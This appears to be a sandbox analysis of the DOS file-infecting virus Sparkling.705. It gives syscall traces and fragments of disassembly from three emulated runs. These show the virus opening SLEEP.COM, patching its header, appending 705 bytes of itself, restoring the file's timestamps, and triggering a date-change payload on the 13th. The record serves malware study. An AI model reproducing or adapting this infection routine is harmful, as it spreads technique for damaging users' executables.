Sample viewer

vx.netlux.org/Virus.DOS.Sparkling.705

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T22:43:19.385396281Z	44	PC: 12a60 \| Get time 0x12a60: mov byte ptr ds:[bp + 0x10f], dl 0x12a65: lea si, word ptr [bp + 0x26d] 0x12a69: mov di, 0x100 0x12a6c: mov cx, 6 0x12a6f: rep movsb byte ptr es:[di], byte ptr [si] 0x12a71: mov ah, 0x1a 0x12a73: lea dx, word ptr [bp + 0x3b1] 0x12a77: int 0x21 0x12a79: mov ah, 0x4e 0x12a7b: mov cx, 0x3f 0x12a7e: lea dx, word ptr [bp + 0x279] 0x12a82: int 0x21 0x12a84: jae 0x12a89 0x12a86: jmp 0x12b1d 0x12a89: mov ax, word ptr ds:[bp + 0x3cb] 0x12a8e: sub ax, 3 0x12a91: mov word ptr ds:[bp + 0x274], ax 0x12a96: call 0x12b3d 0x12a99: mov bx, word ptr ds:[bp + 0x3dc] 0x12a9e: mov ah, 0x3f
2018-12-17T22:43:19.387379118Z	26	PC: 12a79 \| Set disk transfer address
2018-12-17T22:43:19.388670131Z	78	PC: 12a84 \| Find first file
2018-12-17T22:43:19.394291425Z	67	PC: 12b47 \| Get or set file attributes
2018-12-17T22:43:19.400221048Z	67	PC: 12b58 \| Get or set file attributes
2018-12-17T22:43:19.418483919Z	61	PC: 12b62 \| Open file (Filename = 'SLEEP.COM')
2018-12-17T22:43:19.425803905Z	87	PC: 12b72 \| Get or set file date and time
2018-12-17T22:43:19.427281051Z	63	PC: 12aa9 \| Read file or device (Read 6 bytes on handle 5)
2018-12-17T22:43:19.435277201Z	66	PC: 12ac7 \| Move file pointer
2018-12-17T22:43:19.436913036Z	64	PC: 12ad7 \| Write file or device (Write 6 bytes on handle 5)
2018-12-17T22:43:19.439869449Z	66	PC: 12ae9 \| Move file pointer
2018-12-17T22:43:19.443131277Z	64	PC: 12b1a \| Write file or device (Write 705 bytes on handle 5)
2018-12-17T22:43:19.452573999Z	87	PC: 12b92 \| Get or set file date and time
2018-12-17T22:43:19.454754522Z	62	PC: 12b9b \| Close file
2018-12-17T22:43:19.463931262Z	67	PC: 12bac \| Get or set file attributes
2018-12-17T22:43:19.475199358Z	42	PC: 12b21 \| Get date 0x12b21: cmp dl, 0xd 0x12b24: jne 0x12b38 0x12b26: mov ah, 0x2b 0x12b28: mov dl, 0xe 0x12b2a: int 0x21 0x12b2c: mov ah, 9 0x12b2e: lea dx, word ptr [bp + 0x27f] 0x12b32: int 0x21 0x12b34: mov ah, 0x4c 0x12b36: int 0x21 0x12b38: mov ax, 0x100 0x12b3b: push ax 0x12b3c: ret 0x12b3d: mov ah, 0x43 0x12b3f: mov al, 0 0x12b41: lea dx, word ptr [bp + 0x3cf] 0x12b45: int 0x21 0x12b47: mov byte ptr ds:[bp + 0x3de], cl 0x12b4c: xor cx, cx 0x12b4e: mov ah, 0x43
2018-12-17T22:43:19.478616828Z	76	PC: 12a44 \| Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7838,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:02:49.547523352Z	44	PC: 12a60 \| Get time 0x12a60: mov byte ptr ds:[bp + 0x10f], dl 0x12a65: lea si, word ptr [bp + 0x26d] 0x12a69: mov di, 0x100 0x12a6c: mov cx, 6 0x12a6f: rep movsb byte ptr es:[di], byte ptr [si] 0x12a71: mov ah, 0x1a 0x12a73: lea dx, word ptr [bp + 0x3b1] 0x12a77: int 0x21 0x12a79: mov ah, 0x4e 0x12a7b: mov cx, 0x3f 0x12a7e: lea dx, word ptr [bp + 0x279] 0x12a82: int 0x21 0x12a84: jae 0x12a89 0x12a86: jmp 0x12b1d 0x12a89: mov ax, word ptr ds:[bp + 0x3cb] 0x12a8e: sub ax, 3 0x12a91: mov word ptr ds:[bp + 0x274], ax 0x12a96: call 0x12b3d 0x12a99: mov bx, word ptr ds:[bp + 0x3dc] 0x12a9e: mov ah, 0x3f
2018-12-25T12:02:49.549962642Z	26	PC: 12a79 \| Set disk transfer address
2018-12-25T12:02:49.551725119Z	78	PC: 12a84 \| Find first file
2018-12-25T12:02:49.55835606Z	67	PC: 12b47 \| Get or set file attributes
2018-12-25T12:02:49.564683982Z	67	PC: 12b58 \| Get or set file attributes
2018-12-25T12:02:49.583104353Z	61	PC: 12b62 \| Open file (Filename = 'SLEEP.COM')
2018-12-25T12:02:49.594965488Z	87	PC: 12b72 \| Get or set file date and time
2018-12-25T12:02:49.596896161Z	63	PC: 12aa9 \| Read file or device (Read 6 bytes on handle 5)
2018-12-25T12:02:49.60328589Z	66	PC: 12ac7 \| Move file pointer
2018-12-25T12:02:49.604812457Z	64	PC: 12ad7 \| Write file or device (Write 6 bytes on handle 5)
2018-12-25T12:02:49.608265565Z	66	PC: 12ae9 \| Move file pointer
2018-12-25T12:02:49.610367074Z	64	PC: 12b1a \| Write file or device (Write 705 bytes on handle 5)
2018-12-25T12:02:49.618939891Z	87	PC: 12b92 \| Get or set file date and time
2018-12-25T12:02:49.620395327Z	62	PC: 12b9b \| Close file
2018-12-25T12:02:49.628670749Z	67	PC: 12bac \| Get or set file attributes
2018-12-25T12:02:49.731930001Z	42	PC: 12b21 \| Get date 0x12b21: cmp dl, 0xd 0x12b24: jne 0x12b38 0x12b26: mov ah, 0x2b 0x12b28: mov dl, 0xe 0x12b2a: int 0x21 0x12b2c: mov ah, 9 0x12b2e: lea dx, word ptr [bp + 0x27f] 0x12b32: int 0x21 0x12b34: mov ah, 0x4c 0x12b36: int 0x21 0x12b38: mov ax, 0x100 0x12b3b: push ax 0x12b3c: ret 0x12b3d: mov ah, 0x43 0x12b3f: mov al, 0 0x12b41: lea dx, word ptr [bp + 0x3cf] 0x12b45: int 0x21 0x12b47: mov byte ptr ds:[bp + 0x3de], cl 0x12b4c: xor cx, cx 0x12b4e: mov ah, 0x43
2018-12-25T12:02:49.73409259Z	76	PC: 12a44 \| Terminate with return code (Return code = '0')

{"DateBased":true,"Day":13,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7838,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:02:50.186516398Z	44	PC: 12a60 \| Get time 0x12a60: mov byte ptr ds:[bp + 0x10f], dl 0x12a65: lea si, word ptr [bp + 0x26d] 0x12a69: mov di, 0x100 0x12a6c: mov cx, 6 0x12a6f: rep movsb byte ptr es:[di], byte ptr [si] 0x12a71: mov ah, 0x1a 0x12a73: lea dx, word ptr [bp + 0x3b1] 0x12a77: int 0x21 0x12a79: mov ah, 0x4e 0x12a7b: mov cx, 0x3f 0x12a7e: lea dx, word ptr [bp + 0x279] 0x12a82: int 0x21 0x12a84: jae 0x12a89 0x12a86: jmp 0x12b1d 0x12a89: mov ax, word ptr ds:[bp + 0x3cb] 0x12a8e: sub ax, 3 0x12a91: mov word ptr ds:[bp + 0x274], ax 0x12a96: call 0x12b3d 0x12a99: mov bx, word ptr ds:[bp + 0x3dc] 0x12a9e: mov ah, 0x3f
2018-12-25T12:02:50.191347202Z	26	PC: 12a79 \| Set disk transfer address
2018-12-25T12:02:50.192320955Z	78	PC: 12a84 \| Find first file
2018-12-25T12:02:50.197870191Z	67	PC: 12b47 \| Get or set file attributes
2018-12-25T12:02:50.204291898Z	67	PC: 12b58 \| Get or set file attributes
2018-12-25T12:02:50.629788015Z	61	PC: 12b62 \| Open file (Filename = 'SLEEP.COM')
2018-12-25T12:02:50.641651072Z	87	PC: 12b72 \| Get or set file date and time
2018-12-25T12:02:50.642906752Z	63	PC: 12aa9 \| Read file or device (Read 6 bytes on handle 5)
2018-12-25T12:02:50.649192157Z	66	PC: 12ac7 \| Move file pointer
2018-12-25T12:02:50.650397558Z	64	PC: 12ad7 \| Write file or device (Write 6 bytes on handle 5)
2018-12-25T12:02:50.652949491Z	66	PC: 12ae9 \| Move file pointer
2018-12-25T12:02:50.656818186Z	64	PC: 12b1a \| Write file or device (Write 705 bytes on handle 5)
2018-12-25T12:02:50.666935807Z	87	PC: 12b92 \| Get or set file date and time
2018-12-25T12:02:50.672214635Z	62	PC: 12b9b \| Close file
2018-12-25T12:02:50.679685344Z	67	PC: 12bac \| Get or set file attributes
2018-12-25T12:02:50.689413264Z	42	PC: 12b21 \| Get date 0x12b21: cmp dl, 0xd 0x12b24: jne 0x12b38 0x12b26: mov ah, 0x2b 0x12b28: mov dl, 0xe 0x12b2a: int 0x21 0x12b2c: mov ah, 9 0x12b2e: lea dx, word ptr [bp + 0x27f] 0x12b32: int 0x21 0x12b34: mov ah, 0x4c 0x12b36: int 0x21 0x12b38: mov ax, 0x100 0x12b3b: push ax 0x12b3c: ret 0x12b3d: mov ah, 0x43 0x12b3f: mov al, 0 0x12b41: lea dx, word ptr [bp + 0x3cf] 0x12b45: int 0x21 0x12b47: mov byte ptr ds:[bp + 0x3de], cl 0x12b4c: xor cx, cx 0x12b4e: mov ah, 0x43
2018-12-25T12:02:50.693473545Z	43	PC: 12b2c \| Set date
2018-12-25T12:02:50.697750819Z	9	PC: 12b34 \| Display string (Could not find end pointer)
2018-12-25T12:02:50.715015585Z	76	PC: 12b38 \| Terminate with return code (Return code = '36')